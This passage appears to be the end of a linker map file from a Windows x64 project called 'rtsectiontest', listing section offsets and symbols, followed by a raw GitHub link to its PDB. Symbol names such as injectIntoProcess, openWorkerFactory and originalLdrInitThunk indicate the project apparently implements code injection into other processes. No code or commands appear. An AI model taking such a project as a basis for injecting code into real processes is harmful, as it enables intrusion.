100 |  0000:ffffb000       .debug$S                   0000000140000000     myntdll:ntdll.dll
101 |  0000:ffffb000       .debug$S                   0000000140000000     myntdll:ntdll.dll
102 |  0001:000008e0       $$000000                   00000001400018e0     auxfuncs.obj
103 |  0002:000002b0       $unwind$dispError          00000001400022b0     main.obj
104 |  0002:000002b8       $unwind$openWorkerFactory  00000001400022b8     main.obj
105 |  0002:000002d4       $unwind$injectIntoProcess  00000001400022d4     main.obj
106 |  0002:000002ec       $unwind$openProcsByName    00000001400022ec     main.obj
107 |  0002:00000304       $unwind$mymain             0000000140002304     main.obj
108 |  0002:000005e6       .idata$6                   00000001400025e6     myntdll:ntdll.dll
109 |  0003:00000000       $$000000                   0000000140003000     auxfuncs.obj
110 |  0003:0000010f       originalLdrInitThunk       000000014000310f     auxfuncs.obj
111 |  0003:00000188       ?szOutputKeyPath@?1??myWPrintf@@9@9 0000000140003188     main.obj
112 |  0003:000001c0       ?objIndex@?1??openWorkerFactory@@9@9 00000001400031c0     main.obj
113 |  0003:000001d0       pZeroBuf                   00000001400031d0     main.obj
114 |  0004:00000000       $pdata$dispError           0000000140004000     main.obj
115 |  0004:0000000c       $pdata$openWorkerFactory   000000014000400c     main.obj
116 |  0004:00000018       $pdata$injectIntoProcess   0000000140004018     main.obj
117 |  0004:00000024       $pdata$openProcsByName     0000000140004024     main.obj
118 |  0004:00000030       $pdata$mymain              0000000140004030     main.obj
119 | 


--------------------------------------------------------------------------------
/x64/Release/rtsectiontest.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/x64/Release/rtsectiontest.pdb


--------------------------------------------------------------------------------